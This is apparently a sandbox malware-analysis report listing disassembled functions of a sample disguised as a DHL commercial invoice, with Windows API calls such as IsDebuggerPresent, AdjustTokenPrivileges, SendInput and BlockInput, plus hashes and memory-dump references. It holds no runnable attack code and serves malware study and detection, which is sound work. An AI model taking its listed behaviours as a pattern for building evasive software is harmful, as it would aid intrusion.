Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: fc79ab89eb20e389139f0e44a4d3b8ac630a31de91675c2c64cbfa10cc2abb0a
Instruction ID: e9c94a6d782ecf8a1e91801f2f052d709727e5a851880d7bef818750c0c43467
Opcode Fuzzy Hash: fc79ab89eb20e389139f0e44a4d3b8ac630a31de91675c2c64cbfa10cc2abb0a
Instruction Fuzzy Hash: BD313930A2071AAFFF368B69C8087FA7BA7AF89310F84431AE681931D1C3758595C791

Function 012A8298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 012A82AA

Strings

|, xrefs: 012A82DA
(, xrefs: 012A82F0

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 1c1f2779c8e0761128c201be8bc94babcf32fc3d099f417e4bea4212d90a2657
Instruction ID: e181201a769ebd4c20b536d1fdc23920371fde1aabf084d60ed6a545ab00c392
Opcode Fuzzy Hash: 1c1f2779c8e0761128c201be8bc94babcf32fc3d099f417e4bea4212d90a2657
Instruction Fuzzy Hash: 1D323574A10606DFDB28CF19C481A6ABBF0FF48710B55C46EE99ADB3A1E770E941CB40

Function 01272622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0127271A
SetUnhandledExceptionFilter.KERNEL32 ref: 01272724
UnhandledExceptionFilter.KERNEL32(?), ref: 01272731

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: ee7f6ddd4bc0b6447f6f61443934112f6410155adafb53ddf9575b2eeb719cf9
Instruction ID: 7417a9cbfb03f5cc954dbcd666eefb394a3e83eb20f3318b0327cf9a64436614
Opcode Fuzzy Hash: ee7f6ddd4bc0b6447f6f61443934112f6410155adafb53ddf9575b2eeb719cf9
Instruction Fuzzy Hash: 8831C674D1121D9BCB21DF68D9887DDBBB8AF18310F5042EAE91CA72A0E7309F818F45

Function 012B51CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 012B51DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 012B5238
SetErrorMode.KERNEL32(00000000), ref: 012B52A1

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: bd24f609af9fa00a1154cd5714077b62a9d393a7c091ef540d2a8ef9138216b3
Instruction ID: e11df95a19b22e7ca0099e14f8b3da6b1e88d0833cee073482c2997d6fc77d1d
Opcode Fuzzy Hash: bd24f609af9fa00a1154cd5714077b62a9d393a7c091ef540d2a8ef9138216b3
Instruction Fuzzy Hash: 7E314B75A10119DFDB04DF54D488EADBBB4FF48314F048099E905AB356DB31E856CBA0

Function 012A16C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 0125FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 01260668
Part of subcall function 0125FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 01260685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 012A170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 012A173A
GetLastError.KERNEL32 ref: 012A174A

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 4d2838c7f370a3fe3f8ff57d7570b419df69e85e90ea928e7f62b127a071747a
Instruction ID: fed219efd4840bd488e6e42d998b40cc4b294d88047608f06a0e63aca4ab9411
Opcode Fuzzy Hash: 4d2838c7f370a3fe3f8ff57d7570b419df69e85e90ea928e7f62b127a071747a
Instruction Fuzzy Hash: 1611A3B2825305AFD7289F54ECCAD6BBBBDEB45724B20851EE45697240EB70FC51CB20

Function 012AD5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 012AD608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 012AD645
CloseHandle.KERNEL32(?), ref: 012AD650

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: a2195ccd6bb6e76b9c693e6c84f2c7b6513f3264fbdc053f9bda91dd4a093f98
Instruction ID: 12d1c7ea03acea83fa0baad0cd6d3047008a6fd9db4247dafc74b3d0ae7bda76
Opcode Fuzzy Hash: a2195ccd6bb6e76b9c693e6c84f2c7b6513f3264fbdc053f9bda91dd4a093f98
Instruction Fuzzy Hash: FB115E75E05228BFDB248FA9EC49FAFBFBCEB45B50F104115F904E7284D6704A058BA1

Function 012A1663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 012A168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 012A16A1
FreeSid.ADVAPI32(?), ref: 012A16B1

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: dc4ef5b573779031447209c5649d6c06c20451a959e0804a57be49b488811cca
Instruction ID: e199b91731f1794c741664eb6a6f80da47eee4ed5768e1402120cb50e0509670
Opcode Fuzzy Hash: dc4ef5b573779031447209c5649d6c06c20451a959e0804a57be49b488811cca
Instruction Fuzzy Hash: E8F0F471D51309BBEF00DFE4D889AAEBBBCEB08605F504565E601E2181E774AA548B50

Function 01264CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(012728E9,?,01264CBE,012728E9,013088B8,0000000C,01264E15,012728E9,00000002,00000000,?,012728E9), ref: 01264D09
TerminateProcess.KERNEL32(00000000,?,01264CBE,012728E9,013088B8,0000000C,01264E15,012728E9,00000002,00000000,?,012728E9), ref: 01264D10
ExitProcess.KERNEL32 ref: 01264D22

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: d86be9a1b685f2bc767057c2ea9f2bae38c4ee003deb788bc6586b901966d487
Instruction ID: afbe60ed061e8d7a430eaa68a3b575d1ff4b192b6318e24bf6225bcf5e316a14
Opcode Fuzzy Hash: d86be9a1b685f2bc767057c2ea9f2bae38c4ee003deb788bc6586b901966d487
Instruction Fuzzy Hash: 85E0B631811189AFCF21BF64E90DA593F6DFB55681F104018FD458B166CB35DA92DB80

Function 0127C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 0127C36C

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 5a4ec6c789f8cfc002a780cec70a2510c680897a1eddbbaa207d839a901a2119
Instruction ID: 740044b7e5402f059958c8d3e8245a33bea4ebc0f6a9bb4811b4eef0060433f3
Opcode Fuzzy Hash: 5a4ec6c789f8cfc002a780cec70a2510c680897a1eddbbaa207d839a901a2119
Instruction Fuzzy Hash: AC41287291021BABDB249FBDDC48DBB77B8EB84314F104669FA05D7180E6709A81CB50

Function 0129D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0129D28C

Strings

X64, xrefs: 0129D2A8

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 9b88a903d40c6d9d07ff30c0e0ba17de62336f3838d79dc48705df831f6a6840
Instruction ID: 39cf468b38eef680f2f54b827eb66af6e80324b4cd8f0084adb01cd1db11d4e6
Opcode Fuzzy Hash: 9b88a903d40c6d9d07ff30c0e0ba17de62336f3838d79dc48705df831f6a6840
Instruction Fuzzy Hash: 80D0C9B482511DEBCF90CA90E8C9DD9B37CBB04345F000195F506A2040D77095488F10

Function 0126CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: aecd2b1ac4ce962277c891e38be2220b43055e2923fc774ad2eb973880866ffa
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: 63025C71E1021A9FDF14DFA9C8806ADFBF5EF48324F25816AD959E7384D730AA518B80

Function 012B68EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 012B6918
FindClose.KERNEL32(00000000), ref: 012B6961

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 29f5bbea12d935a45158cd27439581c2fcb8d6d89aea41dcacf3aa89dc680c86
Instruction ID: 0cac7645544940b73636a289af856d91e9e427b7243c95dea0fc6811dd809b87
Opcode Fuzzy Hash: 29f5bbea12d935a45158cd27439581c2fcb8d6d89aea41dcacf3aa89dc680c86
Instruction Fuzzy Hash: A411D0316146019FD714CF29D4C8A66BBE0FF84328F14C69DE9698F2A2C730EC05CB90

Function 012B37B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,012C4891,?,?,00000035,?), ref: 012B37E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,012C4891,?,?,00000035,?), ref: 012B37F4

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: f27ad9b558550e64baa9f17ddad5b86f9ecc56dd4db8045268e5ed7cabe8e631
Instruction ID: 19ca6402eb7a9259a000a976f7316758a510b85f2417301b97c5a949ac53dcef
Opcode Fuzzy Hash: f27ad9b558550e64baa9f17ddad5b86f9ecc56dd4db8045268e5ed7cabe8e631
Instruction Fuzzy Hash: 60F0EC706153256BD72057659C4CFEB369DEFC4761F000165F509D21C4D9605944C7B0

Function 012AB226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C), ref: 012AB25D
keybd_event.USER32 ref: 012AB270

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 4f3953e0a32392e7a82f7dd3386578519e9e5901ce514301a8ed1054ac781490
Instruction ID: b01b05b3d27833636b80bb5b6d750ca10eb261c808459e3428c4041c677bc358
Opcode Fuzzy Hash: 4f3953e0a32392e7a82f7dd3386578519e9e5901ce514301a8ed1054ac781490
Instruction Fuzzy Hash: E7F01D7181424EABEB159FA4D806BAE7FB4FF04305F00804AF955A5195C3798611DF94

Function 012A10BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,012A11FC), ref: 012A10D4
CloseHandle.KERNEL32(?), ref: 012A10E9

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 2ff72f5162189aa223e44cafbf2b669a8d648d44fb896d7cabe4b469454ebc8d
Instruction ID: bbfee28fe8704cca07fa0760260dea6c94076a2102b569e53f6aa28817093580
Opcode Fuzzy Hash: 2ff72f5162189aa223e44cafbf2b669a8d648d44fb896d7cabe4b469454ebc8d
Instruction Fuzzy Hash: 30E04F32029601AFF7652B11FC09E737BA9EB04320F10881DF9A5804B4DB726CA0DB10

Function 0124CAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON

Download Yara Rule

Strings

Variable is not of type 'Object'., xrefs: 01290C40

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.
API String ID: 0-1840281001
Opcode ID: 8c225e19351e0708a69d414dd1cfccff9313ee691cd81f2e55e54ed671010e1f
Instruction ID: 8d0237579b2d5fc940245a5e31cb6e4dedbc1c129753985ae25f82de0ca43046
Opcode Fuzzy Hash: 8c225e19351e0708a69d414dd1cfccff9313ee691cd81f2e55e54ed671010e1f
Instruction Fuzzy Hash: 7E329B7092120ADBDF18DF9CC880AFDBBB8FF15304F144059EA46AB291DB75AA45CB64

Function 0127676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,01276766,?,?,00000008,?,?,0127FEFE,00000000), ref: 01276998

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: bd1b55f0c7e6174b154684105c2c7f2ce956b61c34a29fc795af09507b1177c9
Instruction ID: 00cc1144b0911b282699f93bd2a11a64b4bb04a46365155f7272fd9c6297afe1
Opcode Fuzzy Hash: bd1b55f0c7e6174b154684105c2c7f2ce956b61c34a29fc795af09507b1177c9
Instruction Fuzzy Hash: E0B15E71520A09DFE715CF2CC486B667FA0FF45364F158658EA99CF2A2C335D985CB40

Function 0125B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 0129851F

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 0d0686f8481ecd4ddaee958f418b61d9e320a335dcb472d285bd2c042edafaf0
Instruction ID: 995384d6584ff020f07f2a63fa9dd57aa5bf4489ba3f788c576579a1b56b55ca
Opcode Fuzzy Hash: 0d0686f8481ecd4ddaee958f418b61d9e320a335dcb472d285bd2c042edafaf0
Instruction Fuzzy Hash: 60127171D202199FDF65CF58C881AEEBBF5FF48310F14819AE909EB255D7709A81CB90

Function 012BEAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32 ref: 012BEABD

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 90057f5ee9017ab2210c2c923315febd3d8cb52e372dc55e0203db80879d60a2
Instruction ID: b55e0a94ad3efa03ce4dd0403c4f4b5795a3c5e87cb5e611a32f7ecefca60cf4
Opcode Fuzzy Hash: 90057f5ee9017ab2210c2c923315febd3d8cb52e372dc55e0203db80879d60a2
Instruction Fuzzy Hash: 09E04F312202059FC710EF6DE444EDAF7ECAF987A0F01841AFD49C7390DAB0E8408B90

Function 012AE355 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 012AE37E

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

